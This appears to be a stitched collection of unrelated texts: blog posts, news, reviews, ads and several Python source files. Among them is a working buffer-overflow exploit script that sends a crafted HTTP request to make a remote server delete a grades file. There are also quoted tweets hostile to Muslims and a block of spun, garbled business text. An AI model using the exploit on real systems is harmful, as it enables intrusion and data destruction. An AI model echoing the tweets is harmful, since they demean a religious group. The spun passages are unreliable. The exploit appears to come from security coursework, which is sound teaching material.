As for her cookbook, it is amazing! I was sitting admiring it all last night pointing out pictures and recipes as J. tried to watch a movie. Unlike most cookie cookbooks that are just a collection of recipes thrown together, this one was organized by the texture of the cookie- i.e. chewy, crunchy, etc. What a cool way to set up a cookbook! Also, each recipe is accompanied by a large full color glossy photo. Maybe it's just the artist in me, but I really dislike cookbooks that only include a few pictures.
"Wow, that carbonara I'm not making looks amazing, but is this really how my tortellini is supposed to look?" is a question you should never have to ask when using a cookbook.
Back to the cookies. They all look wonderful and I can't wait to try each one. You really should go out and buy the book. Like right now. And if you are "just going to buy one for a friend", order two. Once you see it for yourself, you won't want to give it up. Only problem is- the book has shown me I need more "tools of the trade". Now I'm not talking about the cute cookie molds (though I wouldn't turn them down if someone happened to pick up some for me!), but more of the basic cookie making tools.
Prime example- rolling pin, like this super cute pink one.
I have held out for a while now- using other objects that do a semi-decent job, but last night as I watched J try to flatten our pizza dough, I caved. We really need a rolling pin.
So thank you Martha. Not only for inspiring us, and coming to Atlanta to give us all the opportunity to meet you, but also for finally showing me just why I really have to have a rolling pin!
*sidenote- I wish she would tell everyone what she uses/ has been doing to keep herself looking so ageless- the woman looked amazing. Refreshed, relaxed, and completely wrinkle free!
|
#!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
# stack values
fd_addr = 0xbfffde10
return_addr = 0xbfffde0c
ebp_addr = 0xbfffde08
i_addr = 0xbfffddfc
value_addr = 0xbfffdbf4
envvar_addr = 0xbfffd9f4
# attack values
func_addr = 0x4007b170
ptr_to_file_addr = fd_addr + 0x8
file_str = "/home/httpd/grades.txt\n"
ret_addr = 0x4007b170
def build_exploit(shellcode):
req = "GET / HTTP/1.0\r\n" + "Host: " # GET request header
req += "a" * (ebp_addr - value_addr + 4) # padding
req += struct.pack("<I",func_addr) # remove()
req += struct.pack("<I",ret_addr) # fake return address (also remove())
req += struct.pack("<I",ptr_to_file_addr) # pointer to "grades.txt"
req += file_str # "grades.txt"
req += "\r\n\r\n" # GET request suffix
return req
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
# execute request
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
|
We looked inside some of the tweets by @Lexa_Merica and here's what we found interesting.
YOU HAVE GOT TO BE KIDDING ME! These chicks are pushing their luck and riding this current idiocracy of #Muslims being allowed to do whatever the hell they want in our #USA We don't get a #Christians Women's day, so no #muslimwomensday 👇Retweet if you agree this is repulsive.
. JESUS is LOVE LOVE is JESUS LOVE is hanging there saying I have Died for you LOVE is giving Life so you can make it through LOVE is Loving more so you can Win your War LOVE is what your Heart has been Longing For .
No Sh!t ! Of course he said that...it gave credibility to the Special Counsel and implied there would be NO political bias for President. Our President isn’t a dummy...if you haven’t figured it out by now he is VERY intelligent!
|
"""Project For Port Monitor on switches."""
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.topology.api import get_switch
from ryu.controller.handler import set_ev_cls
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.lib import hub
from setting.db.data_collection import switch_stat
from setting.routing.utils.calculate_route import check_switch_load
from routing_adjustment import Routing_UpdateEvent
from setting.variable import constant
import logging
import time
import datetime
class PortStatMonitor(app_manager.RyuApp):
_EVENTS = [Routing_UpdateEvent]
"""Class for Port Monitor."""
def __init__(self, *args, **kwargs):
"""Initial method."""
super(PortStatMonitor, self).__init__(*args, **kwargs)
self.topology_api_app = self
self.monitor_thread = hub.spawn(self._monitor)
hdlr = logging.FileHandler('sdn_log.log')
self.logger.addHandler(hdlr)
def _monitor(self):
while True:
switch_list = get_switch(self.topology_api_app, None)
switch_id_list = []
for datapath in switch_list:
self._update_sw_stas(datapath)
self._request_stats(datapath.dp)
switch_id_list.append(datapath.dp.id)
target_list = check_switch_load(switch_id_list, switch_stat,
constant.load_limitation)
print'target_list', target_list, len(target_list)
if len(target_list) > 0:
ev = Routing_UpdateEvent(target_list, constant.load_limitation)
# print 'evevevevevev', ev, ev.msg
self.send_event_to_observers(ev)
hub.sleep(1)
def _update_sw_stas(self, datapath):
"""Update statistics for switches method."""
# Initialization
if switch_stat.get(datapath.dp.id) is None:
alive_ports = []
switch_stat.update({datapath.dp.id: {'alive_port': alive_ports}})
# Update active ports in list
alive_port_list = switch_stat.get(datapath.dp.id).get('alive_port')
for port in datapath.ports:
if port.is_live():
if port.port_no not in alive_port_list:
alive_port_list.append(port.port_no)
else:
if port.port_no in alive_port_list:
alive_port_list.remove(port.port_no)
if switch_stat.get(datapath.dp.id).get('stats').get(port.port_no) is not None:
p_stat = switch_stat.get(datapath.dp.id).get('stats')
p_stat[port.port_no] = None
def _request_stats(self, datapath):
"""Send PortStatsRequest method."""
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def _port_stats_reply_handler(self, ev):
"""Handle PortStatsReply from switches method."""
sw_dpid = ev.msg.datapath.id
# self.logger.info('-----------')
# self.logger.info(ev.msg.datapath.id)
# self.logger.info('-----------')
# Initialization
if switch_stat.get(sw_dpid).get('stats') is None:
switch_stat.get(sw_dpid).update({'stats': {}})
if switch_stat.get(sw_dpid).get('weight') is None:
switch_stat.get(sw_dpid).update({'weight': {}})
if switch_stat.get(sw_dpid).get('cost') is None:
switch_stat.get(sw_dpid).update({'cost': 0.0})
if switch_stat.get(sw_dpid).get('load') is None:
switch_stat.get(sw_dpid).update({'load': 0.0})
r = 0
t = 0
e = 0
for stat in ev.msg.body:
if stat.port_no in switch_stat.get(sw_dpid).get('alive_port'):
# Claculate statistics on each active port
# self.logger.info(stat.port_no)
counter_list = [stat.port_no, stat.rx_bytes, stat.tx_bytes, stat.rx_dropped, stat.tx_dropped, stat.rx_errors, stat.tx_errors, stat.collisions]
port_stat = {stat.port_no: counter_list}
p_r = 0
p_t = 0
p_e = 0
if switch_stat.get(sw_dpid).get('stats').get(stat.port_no) is not None:
his_stat = switch_stat.get(sw_dpid).get('stats').get(stat.port_no)
# self.logger.info('%s %s', counter_list, his_stat)
# self.logger.info('rx_byte %d', (counter_list[1] - his_stat[1])/1)
# self.logger.info('tx_byte %d', (counter_list[2] - his_stat[2])/1)
# self.logger.info('drop %d', (counter_list[3] - his_stat[3])/1)
p_r = (counter_list[1] - his_stat[1])/1
p_t = (counter_list[2] - his_stat[2])/1
p_e = (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
r = r + (counter_list[1] - his_stat[1])/1
t = t + (counter_list[2] - his_stat[2])/1
e = e + (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
weight_list = [p_r, p_t, p_e]
port_weight = {stat.port_no: weight_list}
# Update port statistics
sw_stat = switch_stat.get(sw_dpid).get('stats')
sw_stat.update(port_stat)
sw_weight = switch_stat.get(sw_dpid).get('weight')
sw_weight.update(port_weight)
# self.logger.info('=======')
# self.logger.info('cost function r : %d', r)
# self.logger.info('cost function t : %d', t)
# self.logger.info('cost function r-t: %d', r-t)
# self.logger.info('cost function d: %d', e)
# ts = time.time()
# st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
# self.logger.info('time %s', st)
pp = r-t
if r != 0:
# self.logger.info('cost function: %f',float(pp)/float(r))
switch_stat.get(sw_dpid).update({'cost': float(pp)/float(r)})
switch_stat.get(sw_dpid).update({'load': [r, t, e]})
|
Delivery Company presents worldwide transport by sea, air and land for a number of companies every day. They handle all kinds of freights serving to the companies to courier their products. They assure that the freights attain its destination on time. Whether or not it is small or large, all companies may have quite a few freights to ship from one point to a different. Corporations at all times choose freight providers that can bring maximum profits and save time while transferring or shifting items. Normally reputed transport firms will fulfill the wants of their customers and provide dependable freight movement to other international locations and continents. In addition they guarantee on-time supply and security of the products.
When Matt Morris was 21 years outdated, he was broke, homeless, dwelling out of his car and showering beneath the gutter when it rained. 27 months later, he had turned his entire life around via the facility of private growth and made over $three,244,832 in his own companies. Matt envisions a world where poverty doesn’t exist, the place no little one has to go to mattress hungry, and has chosen to take personal duty to attempt to create such a world.
Preserving observe of enterprise expenses helps you stay organized, which can ultimately result in financial savings at tax time. Include all the pieces that you simply spend on your corporation, transportation and ISP service are frequent examples. Once you’re self employed, there are various business bills that become tax deductible. Although the amount seems small, it could shortly add up. You should not have to offer the government the entire money that you just labored onerous to earn.
There are totally different points of ceremonies for celebrations equivalent to debuts, birthdays, weddings and other events. There’s the speech by the bride, groom, or other celebrants. There’s the meet and greet, the place previous mates and family meet, alternate pleasantries, and talk concerning the various things that have happened since they last met. Taking pictures and having the meals served are after all, frequent actions throughout formal occasions. Nonetheless, these actions need to mesh collectively in a approach that the company will have the ability to fully enjoy the celebration. On the day of the occasion, one of the most essential individuals for this specific job is the master of ceremonies, who takes on the responsibilities of both entertainer and guiding pressure for the occasion.
The cost of viral advertising and marketing is really dependent on the price of the initial inventive piece that will get sent round. Usually things that go viral aren’t slick, well polished pieces. There are by nature more like residence movies or beginner production items.
Partnership business is the place two or extra individuals formally comply with do enterprise collectively. Partnerships are very straightforward to form; the revenue earned from the business is filed on the person companions’ tax returns. As with sole proprietorship, there is no need of paying corporate income tax and may also avoid double taxation. But sole proprietorship, involves plenty of threat.
5 P.S. 1.original structure and advanced technical design. The secret sauce it research who the goal market is (in all probability folks like you) and analysis how others are incomes cash within the niche. Now listed here are just a few ideas on find out how to begin. Reasons Filipino physiotherapists determine to affix a evaluate middle? 1. a payment account, It is observed that proportion of women customers elevated by seventy two% from 2008 to 2011.
42 year-old Master Fisher Luigi from Guelph, really loves skateboarding, Business and yoyo. Has just finished a journey to Three Parallel Rivers of Yunnan Protected Areas.
|
# -*- coding: utf-8 -*-
from flask import Flask,request, url_for,render_template
import mandelbrot
import random
app = Flask(__name__)
@app.route("/user/pepe")
def pepe():
return "CONTENIDO WEB ESTATICO PARA PEPE"
@app.route("/user/zerjillo")
def zerjillo():
return "CONTENIDO WEB ESTATICO PARA ZERJILLO"
@app.route("/user/<name>")
def usuario(name):
return "CONTENIDO WEB ESTATICO PARA EL USUARIO : " + name
@app.route("/mandelbrot" , methods = ['POST'])
def mand():
x1 = float(request.form['x1'])
y1 = float(request.form['y1'])
x2 = float(request.form['x2'])
y2 = float(request.form['y2'])
witdh= int(request.form['witdh'])
mandelbrot.renderizaMandelbrot(x1,y1,x2,y2,witdh,500,"static/mandelbrot.png")
image='<img src=' + url_for('static',filename='mandelbrot.png') + ' width="50%" >'
return image
@app.route("/")
def hello():
enlace='<a href=' + "http://localhost:8080/static/index2.html" + '>' + "IR A PRACTICA 2" + "</a>"
return enlace
@app.route("/svg")
def svg():
colors=['blue','black']
bucle=random.randint(1,100)
imagen='<svg height="500px" width="500px">'
for i in range(100):
forma={'1':'<circle cx="'+str(random.randint(1,500))+'" cy="'+str(random.randint(1,500))+'" r="'+str(random.randint(1,20))+'" stroke="'+colors[random.randint(0,1)]+'" stroke-width="'+str(random.randint(1,2))+'" fill="'+colors[random.randint(0,1)] +'" />'}
imagen=imagen+forma[str(1)]
imagen=imagen+'</svg>'
return imagen
@app.errorhandler(404)
def page_not_found(error):
return "Pagina no encontrada", 404
if __name__ == "__main__":
app.run(host='0.0.0.0',debug=True)
|
Sebastopol claimed victory on Saturday, but it wasn’t enough to break back into the Geelong-Ballarat Premier Bowls top four. The Kookaburras beat Buninyong by 29 shots, however they still remain in sixth spot on the table. Sebastopol is seven points behind the fourth-placed Eastern Park, which beat top side Bareena on Saturday. That loss was only Bareena’s second for the campaign. Elsewhere at the weekend, Ocean Grove claimed a strong victory over the lowly Highton and Lara kept up the pressure on the top four with success against bottom side Victoria. The final match of the round saw Queenscliff outgun Webbcona.
GOOD ROLL: Sebastopol's Rob Baker in action on Saturday afternoon.
Sebastopol claimed victory on Saturday, but it wasn’t enough to break back into the Geelong-Ballarat Premier Bowls top four.
The Kookaburras beat Buninyong by 29 shots, however they still remain in sixth spot on the table.
Sebastopol is seven points behind the fourth-placed Eastern Park, which beat top side Bareena on Saturday.
That loss was only Bareena’s second for the campaign.
Elsewhere at the weekend, Ocean Grove claimed a strong victory over the lowly Highton and Lara kept up the pressure on the top four with success against bottom side Victoria.
The final match of the round saw Queenscliff outgun Webbcona.
|
# Copyright 2019 Deepmind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Distribution utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def multi_normal(loc, log_scale):
return MultiNormalDiagFromLogScale(loc=loc, log_scale=log_scale)
class MultiNormalDiagFromLogScale(tfd.MultivariateNormalDiag):
"""MultiNormalDiag which directly exposes its input parameters."""
def __init__(self, loc, log_scale):
scale = tf.exp(log_scale)
self._log_scale = log_scale
self._input_mean = loc
super(MultiNormalDiagFromLogScale, self).__init__(
loc, scale)
@property
def input_mean(self):
return self._input_mean
@property
def log_scale(self):
return self._log_scale
@property
def dist_vars(self):
return [self.input_mean, self.log_scale]
def diagonal_gaussian_posterior(data_dims):
mean = tf.Variable(
tf.zeros(shape=(data_dims), dtype=tf.float32), name='mean')
log_scale = tf.Variable(
tf.zeros(shape=(data_dims), dtype=tf.float32), name='log_scale')
return multi_normal(loc=mean, log_scale=log_scale)
def std_gaussian_from_std_dsmaxwell(std_dsmaxwell_samples):
"""Generate Gaussian variates from Maxwell variates.
Useful for coupling samples from Gaussian and double_sided Maxwell dist.
1. Generate ds-maxwell variates: dsM ~ dsMaxwell(0,1)
2. Generate uniform variatres: u ~ Unif(0,1)
3. multiply y = u * dsM
The result is Gaussian distribution N(0,1) which can be loc-scale adjusted.
Args:
std_dsmaxwell_samples: Samples generated from a zero-mean, unit variance
double-sided Maxwell distribution M(0,1).
Returns:
Tensor of Gaussian variates with shape maxwell_samples.
"""
unif_rvs = tf.random.uniform(std_dsmaxwell_samples.shape)
gaussian_rvs = unif_rvs * std_dsmaxwell_samples
return gaussian_rvs
def sample_weibull(sh, scale, concentration):
distrib = tfp.distributions.TransformedDistribution(
distribution=tfp.distributions.Uniform(low=0., high=1. - 1e-6),
bijector=tfp.bijectors.Invert(
tfp.bijectors.Weibull(scale=scale, concentration=concentration)))
return distrib.sample(sh)
def sample_ds_maxwell(sh, loc, scale):
return tfd.DoublesidedMaxwell(loc=loc, scale=scale).sample(sh)
|
So I feel most would agree that while Christmas is one of the best times of year, the music can get quite repetitive. I mean, all we ever hear is Mariah Carey, Michael Buble, Justin Bieber’s “Drummer Boy” and Ariana Grande’s “Santa Tell Me” and while there is nothing really wrong with this, its been the same songs for years and I know I’m in the need for something new. Now, good thing Tyler, the Creator has my back and has released a Christmas-Grinch themed EP just in time. The EP is only 10 minutes with 6 songs but doesn’t include “You’re A Mean One, Mr Grinch” (my 2018 Christmas anthem) or “ I Am the Grinch” which are featured on the soundtrack for the new animated Grinch movie. So let’s take a look of what Tyler has brought us this Christmas.
Now as I said before the EP has only 6 tracks and like most EPs the first is just an intro. The intro track is called “Whoville” after the iconic village featured in the Grinch. The song starts off with your standard piano chord progression but as the song progresses little details are involved and build up to the end of the song. For example after a couple rounds of the chord progressions a little melody is introduced, then little bells are brought in, then the synths and then what sounds like a xylophone with some percussion and it all crescendos until an abrupt stop at the end when the next song begins. Now, generally I’m not a big fan of these intro tracks because I find most quite basic but Tyler was able to capture and create such a vivid mood in only a minute which really set the tone for the EP so props to him.
The song that follows is “Lights On” featuring Ryan Beatty and Santigold. I think this is one of the best songs on the EP because the melody resembles your typical Christmas song but with the beat added in the background it gives it more of a modern style. I also think it has a really catchy tune which will 100% be stuck in my head for the next week or two. Lyrically I interpreted the song as being about a relationship where the girl is alone at home around Christmas time and the boy is talking about how he’s rushing home and even though it may take a while he’s on his way to her. I think it’s actually a really cute song and definitely one of my favourites.
Track 3 is “Hot Chocolate” featuring Jerry Paper and is very fitting for this time of the year. Again, keeping with the Christmas theme, the melody resembles a Christmas carol and the intro even incorporates some bells but the added production shows that it belongs in the modern alternative music era. I think this is one of the songs that makes you feel all warm and fuzzy inside because it’s very simply about making a hot chocolate and drinking it by the fire surrounded by friends at Christmas time. Tyler is able to depict the ideal way to spend your holidays surrounded by friends and I think this song is quite beautiful in its simplicity.
Next is “Big Bag” and is the typically Tyler, the Creator sound we all know and love. The melody and beat is quite typical of Tyler, with a lot of rapping and an upbeat rhythm that was heard a lot on his last album “Flower Boy”. The “Big Bag” in the song refers to Santa’s sack full of presents and Tyler talks about how he didn’t really have a Santa Claus because his mum worked so he was wrapping his own gifts. However, in the second verse the point of view changes and Tyler raps from the point of the view of the Grinch and talks about stealing the presents of other kids. I think this contrast is really interesting because it shows the different ways people grow up around Christmas, you know, some didn’t have the typical childhood Christmas as they couldn’t afford it where others grew up with a very wealthy lifestyle and almost have this feeling of entitlement around the holidays and I think this contrast, whether intended or not, is a very clever thing to have included in the EP. I also love the common theme of the Grinch as that’s my favourite Christmas movie.
The next track is “When Gloves Come Off” featuring Ryan Beatty again. This one is very similar to “Hot Chocolate” in that identical instruments are used but with a different melody. This one is more of a transitional track rather than a song because it’s very melodic based with vocal harmonies and runs by Ryan Beatty and few actual words being sung. This one is probably a skip for me as I generally prefer more lyrically based songs but if you’re into instrumentals this might be the one for you.
The final track on the album is “Cindy Lou’s Wish”, named after the little girl from the Grinch. This song too is purely instrumental with no words at all. When I first listened to it, I’ve got to say I was a little disappointed. For the last track of the album I was expecting the perfect Christmas track to top off the album so having an instrumental was a bit anticlimatic. I could see why Tyler would have chosen an instrumental as a closing track, to almost fade the album to its end but i would have prefered a more upbeat ending. There’s not much to say about the track in general as its very similar to the rest of the album. The same instruments used with even a very similar sounding melody, much like “Lights On” and “Hot Chocolate”. Most of the songs sound relatively similar so that’s why I found this one a but of a let down because I was craving something new.
Overall I really enjoyed the album, disregsrding the last two tracks. My favourite though is definitely “Lights On” because it just puts you in the Christmas spirit. So I would definitely recommend listening to this album this holiday season, maybe you’ll find a song will become one of your yearly favourites.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-12-29 08:15
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='email',
name='content',
field=models.CharField(max_length=3000, null=True),
),
migrations.AddField(
model_name='email',
name='create_time',
field=models.DateField(default=datetime.datetime(2016, 12, 29, 16, 15, 9, 188000), verbose_name='\u521b\u5efa\u65f6\u95f4'),
),
migrations.AddField(
model_name='email',
name='from_user',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='email',
name='status',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='email',
name='title',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='email',
name='to_user',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='email',
name='id',
field=models.AutoField(primary_key=True, serialize=False, verbose_name='\u90ae\u4ef6Id'),
),
]
|
This Dodge Avenger Looks and Drives good. Great value! Bad Credit? We Can Help!
Crown City Motors | Bad Credit Car Loan Specialists has been visited 15,465,974 total times.
|
"""Example script to load Scanbox data as a SIMA sequence."""
from __future__ import division
import argparse
import fnmatch
import os
import numpy as np
import sima
from sima import imaging_parameters
def sbxread(path, info_path):
"""Read in an .sbx file and return a SIMA sequence.
Based off of the sbxRead Matlab implementation and
https://scanbox.org/2016/09/02/reading-scanbox-files-in-python/
Parameters
----------
path : str
Path to the Scanbox data file (including the .sbx extension).
info_path : str
Path to the Scanbox info MAT file.
"""
info = imaging_parameters.extract_imaging_parameters(
info_path, format='Scanbox')
nrows = info['recordsPerBuffer']
ncols = info['sz'][1]
nchannels = info['nchannels']
nplanes = info['nplanes']
nframes = (info['max_idx'] + 1) // nplanes
shape = (nchannels, ncols, nrows, nplanes, nframes)
seq = sima.Sequence.create(
'memmap', path=path, shape=shape, dim_order='cxyzt', dtype='uint16',
order='F')
max_uint16_seq = sima.Sequence.create(
'constant', value=np.iinfo('uint16').max, shape=seq.shape)
return max_uint16_seq - seq
def initialize_sbx_datasets(path, calc_time_averages=False):
"""Locate and initialize a SIMA dataset for all Scanbox sbx files."""
for directory, folders, files in os.walk(path):
for sbx_file in fnmatch.filter(files, '*.sbx'):
info_file = os.path.splitext(sbx_file)[0] + '.mat'
sima_dir = os.path.splitext(sbx_file)[0] + '.sima'
if info_file in files and sima_dir not in folders:
print("Initializing SIMA dataset: {}".format(
os.path.join(directory, sima_dir)))
seq = sbxread(
os.path.join(directory, sbx_file),
os.path.join(directory, info_file))
dset = sima.ImagingDataset(
[seq], savedir=os.path.join(directory, sima_dir))
if calc_time_averages:
print("Calculating time averages: {}".format(
os.path.join(directory, sima_dir)))
dset.time_averages
if __name__ == '__main__':
argParser = argparse.ArgumentParser()
argParser.add_argument(
"-t", "--time_averages", action="store_true",
help="Pre-calc time averages.")
argParser.add_argument(
"path", action="store", type=str, default=os.curdir,
help="Locate all Scanbox files below this path.")
args = argParser.parse_args()
initialize_sbx_datasets(args.path, args.time_averages)
|
Being on vacation is your time to relax, enjoy fun with family and friends and of course, take in the beautiful scenery of the Carolina coastline. This vacation, experience all three pastimes in a new and memorable way by taking a ride on one of Myrtle Beach’s newest and most exciting attractions: The Myrtle Beach SkyWheel.
Located near the Oceanfront Boardwalk and Promenade in Myrtle Beach, SC, the Myrtle Beach SkyWheel opened on May 20, 2011, it operates year-round and has been a huge draw for the tourism industry. So impressive in its size and structure, it can easily be seen from the 501 bridge and acts as a beacon luring vacationers and locals alike to experience a view of the Grand Strand like no other. It is also truly unique in that it is the only observation wheel of its kind in the United States and only the second one in North America. Visitors are invited to step inside one of forty-two climate-controlled and fully enclosed glass gondolas for an eight to twelve-minute ride that will go through three full rotations and take them two hundred feet above sea level. Enjoy panoramic, 360 degree views of the beautiful Atlantic Ocean, gaze upon miles of pristine, white sandy beaches and have a view of Myrtle Beach that will take your breath away.
All gondola passengers will be able to take amazing photographs due to the state of the art, non-reflective glass that encloses each structure. For those vacationers who are looking to view the Grand Strand in an ultimate way, the VIP gondola will take the experience to an entirely different level. Passengers who participate in this option will get to skip the long waiting lines and be personally escorted onto a special VIP gondola with leather seating and a glass-bottomed floor, which will truly give an eye-opening perspective on how tall almost twenty stories really is. Ice buckets are also found inside the VIP gondola to keep your beverages chilled during your ride in the sky.
Once the experience has ended, visitors have the opportunity to visit the gift shop for a vacation souvenir or to stop for a bite to eat at the brand new Jimmy Buffet’s Land Shark Bar and Grill that accompanies the SkyWheel. Parrotheads and others alike will delight in excellent oceanfront views, tasty food and drinks and get to listen to fantastic tunes all while reminiscing about their recent trip high above the Grand Strand. For those who arrive after dark, the Myrtle Beach SkyWheel offers a fantastic evening light show that uses over one million, beautiful LED lights to provide viewers with an amazing show that is sure to delight visitors from the very young to the old.
The Myrtle Beach SkyWheel is located at 1110 North Ocean Boulevard, Myrtle Beach, South Carolina 29577 and visitors can call (843) 839-9200 for more information. The SkyWheel is an amazing and awe-inspiring experience that is sure to make your vacation one that is unforgettable. Here is an opportunity for you to see Myrtle Beach the way you haven’t seen it before and a chance for you to walk away with memory that will last for always.
|
#!/usr/bin/env python
#-*- encoding:utf-8 -*-
# screenshot.py
from PyQt4.QtGui import QApplication, QPixmap
from os import environ, mkdir, listdir
from sys import argv, platform
from time import strftime, gmtime
class Screenshot(object):
def __init__(self):
if platform == 'win32':
self.usuario = environ['USERNAME']
else:
self.usuario = environ['USER']
if not 'screenshot' in listdir('./'):
mkdir('screenshot')
def capturarPantalla(self):
time = strftime("%d %b %Y_%H:%M:%S", gmtime())
imagen = './screenshot/' + self.usuario + '_' + time + '.png'
app = QApplication(argv)
winId = QApplication.desktop().winId()
width = QApplication.desktop().screenGeometry().width()
height = QApplication.desktop().screenGeometry().height()
captura = QPixmap.grabWindow(winId, 0, 0, width, height)
captura.save(imagen)
def main():
ss = Screenshot()
ss.capturarPantalla()
if __name__ == '__main__':
main()
|
Free download Nyte SA – Ebenezer (Original Mix) Mp3. We have about 10+ mp3 files ready to play and download. To start this download Lagu you need to click on [Download] Button. Remember that by downloading this song you accept our terms and conditions. We recommend the first song titled Nyte SA – Ebenezer (Original Mix).mp3 for free.
|
import datetime
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.db.models.aggregates import Sum
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
from django.views.generic.simple import redirect_to
from annoying.decorators import ajax_request
from annoying.decorators import render_to
from accounts.models import UserProfile
from api.models import ChatMessage, MuteList
from api.models import EyeHistory
from api.models import EyeHistoryMessage
from api.models import Page
from api.models import Domain
from api.models import Ratings
from api.utils import humanize_time
from tags.models import Tag
from common.view_helpers import JSONResponse
from common.templatetags.gravatar import gravatar_for_user
from common.templatetags.filters import url_domain
from api.views import rating_get
from eyebrowse.settings import BASE_URL
import re
twitter_username_re = re.compile(r'@([A-Za-z0-9_]+)')
def logged_in(request):
if request.user.is_authenticated():
return JSONResponse({'res': True,
'username': request.user.username})
else:
return JSONResponse({'res': False})
@login_required
def ticker_info(request):
timestamp = timezone.now() - datetime.timedelta(minutes=5)
followers = User.objects.filter(userprofile__followed_by=request.user)
history = EyeHistory.objects.filter(
start_time__gt=timestamp).order_by('-start_time').select_related()
most_recent_hist = None
mutelist_urls = MuteList.objects.filter(
user=request.user,
url__isnull=False
).values_list('url', flat=True)
mutelist_words = MuteList.objects.filter(
user=request.user, word__isnull=False
).values_list('word', flat=True)
users = []
for h in history:
if h.user not in users and h.user in followers:
if most_recent_hist == None:
show = True
if len(mutelist_urls) > 0:
for m in mutelist_urls:
if m in h.url:
show = False
if show and len(mutelist_words) > 0:
for m in mutelist_words:
if m in h.title:
show = False
if show:
most_recent_hist = h
users.append({ 'username': h.user.username,
'pic_url': gravatar_for_user(h.user),
'url': '%s/users/%s' % (BASE_URL, h.user.username),
})
res = {}
res['online_users'] = sorted(users, key=lambda u: u['username'])
if most_recent_hist != None:
res['history_item'] = { 'username': most_recent_hist.user.username,
'pic_url': gravatar_for_user(most_recent_hist.user),
'user_url': '%s/users/%s' % (BASE_URL, most_recent_hist.user.username),
'url': most_recent_hist.url,
'title': most_recent_hist.title,
'favicon': most_recent_hist.favIconUrl,
'time_ago': humanize_time(timezone.now() - most_recent_hist.start_time)
}
t = Tag.objects.filter(user=request.user, domain=most_recent_hist.domain)
if t.exists():
res['history_item']['tag'] = {'name': t[0].name,
'color': t[0].color}
else:
res['history_item'] = None
return JSONResponse(res)
@csrf_exempt
@login_required
def bubble_info(request):
url = request.POST.get('url', '')
domain = url_domain(url)
timestamp = timezone.now() - datetime.timedelta(days=7)
used_users = []
active = []
followers = User.objects.filter(userprofile__followed_by=request.user)
eyehists = EyeHistory.objects.filter((
Q(url=url) | Q(domain=domain)) &
Q(start_time__gt=timestamp) &
~Q(user_id=request.user.id)
).order_by('-end_time').select_related()
for eyehist in eyehists:
if len(active) >= 6:
break
user = eyehist.user
if user not in used_users and user in followers:
old_level = 3
if eyehist.end_time > \
(timezone.now() - datetime.timedelta(minutes=5)):
old_level = 0
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=1)):
old_level = 1
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=24)):
old_level = 2
url_level = "site-level"
if eyehist.url == url:
url_level = "page-level"
active.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'url': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'url_level': url_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
used_users.append(user)
messages = EyeHistoryMessage.objects.filter(
Q(eyehistory__url=url) &
Q(post_time__gt=timestamp)
).order_by('-post_time').select_related()
about_message = None
user_url = None
username = None
message = None
for m in messages:
if m.eyehistory.user in followers:
message = m.message
about_message = humanize_time(
timezone.now() - m.post_time) + ' ago'
user_url = '%s/users/%s' % (BASE_URL, m.eyehistory.user.username)
username = m.eyehistory.user.username
break
if not about_message:
chat_messages = ChatMessage.objects.filter(
url=url).order_by('-date').select_related()
for c in chat_messages:
if c.author in followers:
about_message = humanize_time(timezone.now() - c.date) + ' ago'
message = '"%s"' % (c.message)
user_url = '%s/users/%s' % (BASE_URL, c.author.username)
username = c.author.username
break
if not about_message:
about_message = ''
message = ''
return JSONResponse({
'url': url,
'active_users': active,
'message': message,
'about_message': about_message,
'user_url': user_url,
'username': username,
})
@ajax_request
def profilepic(request):
url = gravatar_for_user(request.user)
url = 'https://%s' % url[7:]
return redirect_to(request, url)
@login_required
@ajax_request
def get_friends(request):
query = request.GET.get('query', None).lower()
user_prof = UserProfile.objects.get(user=request.user)
friends = user_prof.follows.all()
data = []
for friend in friends:
if not query or query in friend.user.username.lower():
data.append({'id': friend.id,
'name': '@%s' % (friend.user.username),
